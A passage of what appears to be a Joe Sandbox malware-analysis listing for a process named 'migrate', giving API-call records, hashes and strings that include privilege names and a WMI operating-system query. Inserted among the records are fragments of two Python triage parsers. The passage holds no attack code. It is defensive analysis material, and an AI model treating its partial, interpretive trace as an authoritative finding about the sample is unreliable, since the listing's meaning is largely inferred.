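  • Part of subcall function 0011A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0011977F,?,?,001195CF,?,?,?,?,?,00142641,000000FF), ref: 0011A1F1
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00117139
• CloseHandle.KERNEL32(00000000), ref: 00117155
Similarity
• String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
"""

if __name__ == "__main__":
    for i, e in enumerate(parse_report(SAMPLE)):
        print(i, e.direct_apis(), "->", triage(e))
```

The order check matters: a function that calls the same four APIs in a different arrangement, or with other calls mixed in, is not matched and stays flagged for manual review. The privilege rule only reports that the names are present in the function's string table; whether they are actually enabled via AdjustTokenPrivileges is not visible in this listing.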
APIs
• _swprintf.LIBCMT ref: 0011E30E
  • Part of subcall function 00114092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001140A5
  • Part of subcall function 00121DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00151030,?,0011D928,00000000,?,00000050,00151030), ref: 00121DC4
• _strlen.LIBCMT ref: 0011E32F
• SetDlgItemTextW.USER32(?,0014E274,?), ref: 0011E38F
• GetWindowRect.USER32(?,?), ref: 0011E3C9
• GetClientRect.USER32(?,?), ref: 0011E3D5
• GetWindowLongW.USER32(?,000000F0), ref: 0011E475
• GetWindowRect.USER32(?,?), ref: 0011E4A2
• SetWindowTextW.USER32(?,?), ref: 0011E4DB
• GetSystemMetrics.USER32(00000008), ref: 0011E4E3
• GetWindow.USER32(?,00000005), ref: 0011E4EE
                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0011E51B
                                                                                                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 0011E58D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                     • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                     • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                     • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                     • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                     • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                     • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                                                                                                                                    • String ID: $%s:$CAPTION$d
                                                                                                                                                                                                    • API String ID: 2407758923-2512411981
                                                                                                                                                                                                    • Opcode ID: 16bdf0e99abb7aa190f78bb5632a18f8441265ef741b81a8dee3bd780c3b181b
                                                                                                                                                                                                    • Instruction ID: 5cb03f1f718c6cb552b34f6984e42d8d892aeadc9a017bba01c79b07bd92536f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 16bdf0e99abb7aa190f78bb5632a18f8441265ef741b81a8dee3bd780c3b181b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C819171508301AFD714DFA8CD89AABBBE9FBC8704F04092DF998D7290D774E9858B52
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 0013CB66
                                                                                                                                                                                                      • Part of subcall function 0013C701: _free.LIBCMT ref: 0013C71E
                                                                                                                                                                                                      • Part of subcall function 0013C701: _free.LIBCMT ref: 0013C730
                                                                                                                                                                                                      • Part of subcall function 0013C701: _free.LIBCMT ref: 0013C742
                                                                                                                                                                                                      • Part of subcall function 0013C701: _free.LIBCMT ref: 0013C754
                                                                                                                                                                                                      • Part of subcall function 0013C701: _free.LIBCMT ref: 0013C766
                                                                                                                                                                                                      • Part of subcall function 0013C701: _free.LIBCMT ref: 0013C778
                                                                                                                                                                                                      • Part of subcall function 0013C701: _free.LIBCMT ref: 0013C78A
                                                                                                                                                                                                      • Part of subcall function 0013C701: _free.LIBCMT ref: 0013C79C
                                                                                                                                                                                                      • Part of subcall function 0013C701: _free.LIBCMT ref: 0013C7AE
                                                                                                                                                                                                      • Part of subcall function 0013C701: _free.LIBCMT ref: 0013C7C0
                                                                                                                                                                                                      • Part of subcall function 0013C701: _free.LIBCMT ref: 0013C7D2
                                                                                                                                                                                                      • Part of subcall function 0013C701: _free.LIBCMT ref: 0013C7E4
                                                                                                                                                                                                      • Part of subcall function 0013C701: _free.LIBCMT ref: 0013C7F6
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013CB5B
                                                                                                                                                                                                      • Part of subcall function 00138DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0013C896,?,00000000,?,00000000,?,0013C8BD,?,00000007,?,?,0013CCBA,?), ref: 00138DE2
                                                                                                                                                                                                      • Part of subcall function 00138DCC: GetLastError.KERNEL32(?,?,0013C896,?,00000000,?,00000000,?,0013C8BD,?,00000007,?,?,0013CCBA,?,?), ref: 00138DF4
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013CB7D
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013CB92
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013CB9D
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013CBBF
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013CBD2
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013CBE0
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013CBEB
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013CC23
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013CC2A
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013CC47
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013CC5F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                     • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                     • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                     • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                     • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                     • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                     • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 161543041-0
                                                                                                                                                                                                    • Opcode ID: cedf2fe04241a87946a2a624ea8a6236a8d1a61eeae6b3a008ad5e5a828eef82
                                                                                                                                                                                                    • Instruction ID: 36c8f7828282fbb3778c742fe9e2b40b6d14c5dd0a351e9d88127d96e342b63b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cedf2fe04241a87946a2a624ea8a6236a8d1a61eeae6b3a008ad5e5a828eef82
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB3159316003069FEF21AB78D846B5AB7F9AF20750F105429F588E71A2DF35EC80CBA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00129736
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 001297D6
                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 001297E5
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00129806
                                                                                                                                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0012982D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                     • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                     • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                     • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                     • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                     • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                     • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                                                                                                                                                    • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                                                                                                                    • API String ID: 1777411235-4209811716
                                                                                                                                                                                                    • Opcode ID: 1bcc26353a920de294a1e5cc8518c0b8b1e560e638426d6f98bb9b8df41e4d4c
                                                                                                                                                                                                    • Instruction ID: 529070be0c2aa827fd9aa78ea5d9c92bac49f35e74c16cb7e4aa20bee76f4150
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1bcc26353a920de294a1e5cc8518c0b8b1e560e638426d6f98bb9b8df41e4d4c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2317D721083257BE725AF38BC06F6F779CEF52320F14011DF511961D1EB749A1887A5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetWindow.USER32(?,00000005), ref: 0012D6C1
                                                                                                                                                                                                    • GetClassNameW.USER32(00000000,?,00000800), ref: 0012D6ED
                                                                                                                                                                                                      • Part of subcall function 00121FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0011C116,00000000,.exe,?,?,00000800,?,?,?,00128E3C), ref: 00121FD1
                                                                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0012D709
                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0012D720
                                                                                                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0012D734
                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0012D75D
                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0012D764
                                                                                                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 0012D76D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                     • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                     • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                     • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                     • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                     • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                     • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                                                                                                                                    • String ID: STATIC
                                                                                                                                                                                                    • API String ID: 3820355801-1882779555
                                                                                                                                                                                                    • Opcode ID: 7fd1b4f7048c9d61e5efc249ab51cc4decc00d333c1b6a63c71b98b4eaf29d7b
                                                                                                                                                                                                    • Instruction ID: 89dab0c8b7ad3550bbe1829dc8666f524ae381042718a47e54d3153b1500947e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7fd1b4f7048c9d61e5efc249ab51cc4decc00d333c1b6a63c71b98b4eaf29d7b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 581121321403307BE2206B70FC4AFAF766CAF24711F008120FA65E2091DB688E9562B2
APIs
• _free.LIBCMT ref: 00139705
  • Part of subcall function 00138DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0013C896,?,00000000,?,00000000,?,0013C8BD,?,00000007,?,?,0013CCBA,?), ref: 00138DE2
  • Part of subcall function 00138DCC: GetLastError.KERNEL32(?,?,0013C896,?,00000000,?,00000000,?,0013C8BD,?,00000007,?,?,0013CCBA,?,?), ref: 00138DF4
• _free.LIBCMT ref: 00139711
• _free.LIBCMT ref: 0013971C
• _free.LIBCMT ref: 00139727
• _free.LIBCMT ref: 00139732
• _free.LIBCMT ref: 0013973D
• _free.LIBCMT ref: 00139748
• _free.LIBCMT ref: 00139753
• _free.LIBCMT ref: 0013975E
• _free.LIBCMT ref: 0013976C
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: c3957ecb5e13317180667c15ad0086a2199cd529898d5a2a22e2920c7e59aaf0
• Instruction ID: d1e7118ab3b1852ea708e1c6c9c8aa24e5066ca86bfbe579dd9d36ec10bbecd3
• Opcode Fuzzy Hash: c3957ecb5e13317180667c15ad0086a2199cd529898d5a2a22e2920c7e59aaf0
• Instruction Fuzzy Hash: 30117276510209AFCF01EF94C982CD93BB5EF24750F5155A5FA088F2A2DF72EE909B84
APIs
Strings
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
• String ID: csm$csm$csm
• API String ID: 322700389-393685449
• Opcode ID: 5c989a3e79d6ba7e701268f7a8abf2717f86c79df6f3fdb543b3de0c5e7cb816
• Instruction ID: dd8297e59741f05f6e46487c2cc0ab542b478ed5d9e34e0e629e51579d207134
• Opcode Fuzzy Hash: 5c989a3e79d6ba7e701268f7a8abf2717f86c79df6f3fdb543b3de0c5e7cb816
• Instruction Fuzzy Hash: CCB16971900209EFCF29EFA4C8819AEBBB9FF24310F14415AF8256B252D735DA52CF95
APIs
• __EH_prolog.LIBCMT ref: 00116FAA
• _wcslen.LIBCMT ref: 00117013
• _wcslen.LIBCMT ref: 00117084
  • Part of subcall function 00117A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00117AAB
  • Part of subcall function 00117A9C: GetLastError.KERNEL32 ref: 00117AF1
  • Part of subcall function 00117A9C: CloseHandle.KERNEL32(?), ref: 00117B00
Strings
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
• String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
• API String ID: 3122303884-3508440684
• Opcode ID: a050ec441001abbe55acbc9db7a8dd2ecf4852a2477399ec15c1f527d976acc0
• Instruction ID: d862ba35cea69440f87bac70fb4dc5253152dbc13ec306b23dea0a07e986e34f
• Opcode Fuzzy Hash: a050ec441001abbe55acbc9db7a8dd2ecf4852a2477399ec15c1f527d976acc0
• Instruction Fuzzy Hash: A541D6B1D08344BAEB29E7709C82FEEB77C9F25304F004475FA65A72C2D7746AC48621
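Records like the one above (privilege names SeCreateSymbolicLinkPrivilege and SeRestorePrivilege next to the NT object-namespace prefix \??\) and the one further down whose MultiByteToWideChar arguments carry ROOT\CIMV2 are the ones worth opening first in a listing of this size, and they are easier to find by parsing the records than by scrolling. The parser below is an added example, not part of this Joe Sandbox report or of Joe Security's tooling. It assumes only the record layout visible on this page (APIs / Strings / Memory Dump Source / Joe Sandbox IDA Plugin / Similarity sections with "•" bullet lines); the indicator list is an assumed triage list chosen for this sample, and SAMPLE is constructed from three of this page's records with argument lists shortened.

```python
"""Parse the function records of a Joe Sandbox 'Execution Graph' listing and
flag those a triager should open first.  Added example, not part of this
report or of Joe Security's tooling; the record layout is the one visible on
this page, the indicator list is an assumed triage list, and SAMPLE is
constructed from records on this page."""
import re
from dataclasses import dataclass, field
from typing import Optional

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity"}

# Matches "• GetLastError.KERNEL32(?,?), ref: 00138DF4" and the bare form
# "• _free.LIBCMT ref: 00139705"; sub-call lines also carry the caller address.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<caller>[0-9A-F]{8}): )?"
    r"(?P<name>[\w:]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})$")
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<value>.*)$")

# Assumed indicators: privilege names, the NT object-namespace prefix and a
# WMI namespace are what made records on this page stand out.
INDICATORS = {
    "privilege-name": re.compile(r"Se[A-Za-z]+Privilege"),
    "nt-path-prefix": re.compile(r"\\\?\?\\"),
    "wmi-namespace": re.compile(r"ROOT\\[A-Za-z0-9]+", re.IGNORECASE),
}

@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str
    caller: Optional[str]  # set on "Part of subcall function" lines

@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    similarity: dict[str, str] = field(default_factory=dict)

def parse_records(text: str) -> list[FunctionRecord]:
    """Split the listing into records; each record starts at an 'APIs' header."""
    records: list[FunctionRecord] = []
    section, current = None, None
    for raw in text.splitlines():
        # "Download File" is the page's link label, not part of the dump name.
        line = raw.strip().removesuffix("Download File").rstrip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            section = line
            if section == "APIs":
                current = FunctionRecord()
                records.append(current)
            continue
        if current is None:  # tail of a record that began before the text
            continue
        if section == "APIs" and (m := API_RE.match(line)):
            args = [a for a in (m["args"] or "").split(",") if a]
            current.apis.append(
                ApiCall(m["name"], m["module"], args, m["ref"], m["caller"]))
        elif section == "Similarity" and (m := KV_RE.match(line)):
            current.similarity[m["key"].strip()] = m["value"].strip()
    return records

def indicators(rec: FunctionRecord) -> dict[str, list[str]]:
    """Indicator label -> matched substrings, searched over the record's
    String ID and over every API argument."""
    haystack = [rec.similarity.get("String ID", "")]
    haystack += [a for call in rec.apis for a in call.args]
    found = {}
    for label, rx in INDICATORS.items():
        hits = sorted({m.group(0) for s in haystack for m in rx.finditer(s)})
        if hits:
            found[label] = hits
    return found

def triage(records: list[FunctionRecord]) -> list[tuple[int, str, list[str]]]:
    """(record index, API ID, indicator labels) for every flagged record."""
    return [(i, rec.similarity.get("API ID", ""), sorted(hits))
            for i, rec in enumerate(records) if (hits := indicators(rec))]

# Constructed from three records on this page (heap cleanup, privilege, WMI).
SAMPLE = r"""
APIs
• _free.LIBCMT ref: 00139705
  • Part of subcall function 00138DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0013C896,?), ref: 00138DE2
  • Part of subcall function 00138DCC: GetLastError.KERNEL32(?,?,0013C896,?), ref: 00138DF4
Memory Dump Source
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
APIs
• __EH_prolog.LIBCMT ref: 00116FAA
  • Part of subcall function 00117A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00117AAB
  • Part of subcall function 00117A9C: GetLastError.KERNEL32 ref: 00117AF1
Similarity
• API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
• String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,0011AF6C,ROOT\CIMV2), ref: 0012FD99
• SysAllocString.OLEAUT32(00000000), ref: 0012FE1F
• _com_issue_error.COMSUPP ref: 0012FE48
"""
```

Calling `triage(parse_records(SAMPLE))` flags the second and third records and leaves the `_free` cleanup function alone; run it over the saved text of a full report to get the same shortlist for every process. The indicator regexes are deliberately narrow (a privilege name, `\??\`, a `ROOT\` namespace) so that a hit means a concrete string and not a generic API name; extend INDICATORS with what matters for your own triage, for instance file names from the report's dropped-file list.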
APIs
  • Part of subcall function 00111316: GetDlgItem.USER32(00000000,00003021), ref: 0011135A
  • Part of subcall function 00111316: SetWindowTextW.USER32(00000000,001435F4), ref: 00111370
• EndDialog.USER32(?,00000001), ref: 0012B610
• SendMessageW.USER32(?,00000080,00000001,?), ref: 0012B637
• SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0012B650
• SetWindowTextW.USER32(?,?), ref: 0012B661
• GetDlgItem.USER32(?,00000065), ref: 0012B66A
• SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0012B67E
• SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0012B694
Strings
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: MessageSend$Item$TextWindow$Dialog
• String ID: LICENSEDLG
• API String ID: 3214253823-2177901306
• Opcode ID: dd932810689cb2f4213d89dd7fccdb6408ef1d63bfc56d6ea7e25417aa1127da
• Instruction ID: f925d560c9645c8460478168fe6661305f8ec1755f5db384d0bea8da1eb9dc4a
• Opcode Fuzzy Hash: dd932810689cb2f4213d89dd7fccdb6408ef1d63bfc56d6ea7e25417aa1127da
• Instruction Fuzzy Hash: 9821C432208225BBD2115F66FC8AF7B3B7DFB4AB51F010418F614E69E0CB9299D1A635
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,98433B35,00000001,00000000,00000000,?,?,0011AF6C,ROOT\CIMV2), ref: 0012FD99
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0011AF6C,ROOT\CIMV2), ref: 0012FE14
                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 0012FE1F
                                                                                                                                                                                                    • _com_issue_error.COMSUPP ref: 0012FE48
                                                                                                                                                                                                    • _com_issue_error.COMSUPP ref: 0012FE52
                                                                                                                                                                                                    • GetLastError.KERNEL32(80070057,98433B35,00000001,00000000,00000000,?,?,0011AF6C,ROOT\CIMV2), ref: 0012FE57
                                                                                                                                                                                                    • _com_issue_error.COMSUPP ref: 0012FE6A
                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,?,0011AF6C,ROOT\CIMV2), ref: 0012FE80
                                                                                                                                                                                                    • _com_issue_error.COMSUPP ref: 0012FE93
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1353541977-0
                                                                                                                                                                                                    • Opcode ID: 92630a50606c73286a222a34709f0c609d0b1804f086dfec95ed2cf5dc477cc5
                                                                                                                                                                                                    • Instruction ID: 21abb49f3af49f674f15abb05e6597fe748c956ccb04c398348e723cae66ea23
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 92630a50606c73286a222a34709f0c609d0b1804f086dfec95ed2cf5dc477cc5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7412C71A00229AFCB119F64EC45FAEBBB8EB58B10F11423EF815E7261D7349951C7E4
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                                                                    • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                                                                                                                                    • API String ID: 3519838083-3505469590
